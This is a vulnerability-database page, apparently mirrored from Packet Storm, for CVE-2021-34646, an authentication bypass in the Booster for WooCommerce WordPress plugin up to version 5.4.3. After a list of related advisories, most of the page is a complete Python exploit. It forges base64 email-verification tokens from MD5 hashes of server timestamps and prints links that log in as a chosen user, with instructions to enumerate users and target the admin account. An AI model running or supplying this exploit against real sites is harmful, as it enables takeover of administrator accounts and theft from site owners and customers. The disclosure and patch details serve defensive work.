WordPress WooCommerce Booster 5.4.3 Authentication Bypass

🗓️ 17 Sep 2021 00:00:00Reported by Sebastian KriestenType

packetstorm🔗 packetstormsecurity.com👁 252 Views

WordPress WooCommerce Booster 5.4.3 Authentication Bypass, Auth Bypass Vulnerabilit

Reporter	Title	Published	Views	Family All 17
0day.today	WordPress WooCommerce Booster Plugin 5.4.3 - Authentication Bypass Exploit	17 Sep 202100:00	–	zdt
GithubExploit	Exploit for Authentication Bypass by Spoofing in Booster Booster_For_Woocommerce	16 Feb 202612:12	–	githubexploit
GithubExploit	Exploit for Authentication Bypass by Spoofing in Booster Booster_For_Woocommerce	15 May 202406:35	–	githubexploit
GithubExploit	Exploit for Authentication Bypass by Spoofing in Booster Booster_For_Woocommerce	4 Sep 202114:19	–	githubexploit
Circl	CVE-2021-34646	30 Aug 202122:32	–	circl
CNNVD	Wordpress plugin Booster for WooCommerce 安全特征问题漏洞	30 Aug 202100:00	–	cnnvd
CVE	CVE-2021-34646	30 Aug 202118:03	–	cve
Cvelist	CVE-2021-34646 Booster for WooCommerce <= 5.4.3 Authentication Bypass	30 Aug 202118:03	–	cvelist
Exploit DB	WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass	17 Sep 202100:00	–	exploitdb
NVD	CVE-2021-34646	30 Aug 202119:15	–	nvd

`# Exploit Title: WordPress Plugin WooCommerce Booster Plugin 5.4.3 - Authentication Bypass  
# Date: 2021-09-16  
# Exploit Author: Sebastian Kriesten (0xB455)  
# Contact: https://twitter.com/0xB455  
#  
# Affected Plugin: Booster for WooCommerce  
# Plugin Slug: woocommerce-jetpack  
# Vulnerability disclosure: https://www.wordfence.com/blog/2021/08/critical=-authentication-bypass-vulnerability-patched-in-booster-for-woocommerce/  
# Affected Versions: <= 5.4.3  
# Fully Patched Version: >= 5.4.4  
# CVE: CVE-2021-34646  
# CVSS Score: 9.8 (Critical)  
# Category: webapps  
#  
# 1:  
# Goto: https://target.com/wp-json/wp/v2/users/  
# Pick a user-ID (e.g. 1 - usualy is the admin)  
#  
# 2:  
# Attack with: ./exploit_CVE-2021-34646.py https://target.com/ 1  
#  
# 3:  
# Check-Out out which of the generated links allows you to access the system  
#  
import requests,sys,hashlib  
import argparse  
import datetime  
import email.utils  
import calendar  
import base64  
  
B = "\033[94m"  
W = "\033[97m"  
R = "\033[91m"  
RST = "\033[0;0m"  
  
parser = argparse.ArgumentParser()  
parser.add_argument("url", help="the base url")  
parser.add_argument('id', type=int, help='the user id', default=1)  
args = parser.parse_args()  
id = str(args.id)  
url = args.url  
if args.url[-1] != "/": # URL needs trailing /  
url = url + "/"  
  
verify_url= url + "?wcj_user_id=" + id  
r = requests.get(verify_url)  
  
if r.status_code != 200:  
print("status code != 200")  
print(r.headers)  
sys.exit(-1)  
  
def email_time_to_timestamp(s):  
tt = email.utils.parsedate_tz(s)  
if tt is None: return None  
return calendar.timegm(tt) - tt[9]  
  
date = r.headers["Date"]  
unix = email_time_to_timestamp(date)  
  
def printBanner():  
print(f"{W}Timestamp: {B}" + date)  
print(f"{W}Timestamp (unix): {B}" + str(unix) + f"{W}\n")  
print("We need to generate multiple timestamps in order to avoid delay related timing errors")  
print("One of the following links will log you in...\n")  
  
printBanner()  
  
  
  
for i in range(3): # We need to try multiple timestamps as we don't get the exact hash time and need to avoid delay related timing errors  
hash = hashlib.md5(str(unix-i).encode()).hexdigest()  
print(f"{W}#" + str(i) + f" link for hash {R}"+hash+f"{W}:")  
token='{"id":"'+ id +'","code":"'+hash+'"}'  
token = base64.b64encode(token.encode()).decode()  
token = token.rstrip("=") # remove trailing =  
link = url+"my-account/?wcj_verify_email="+token  
print(link + f"\n{RST}")  
  
  
  
`

17 Sep 2021 00:00Current

0.4Low risk

Vulners AI Score0.4

EPSS0.22506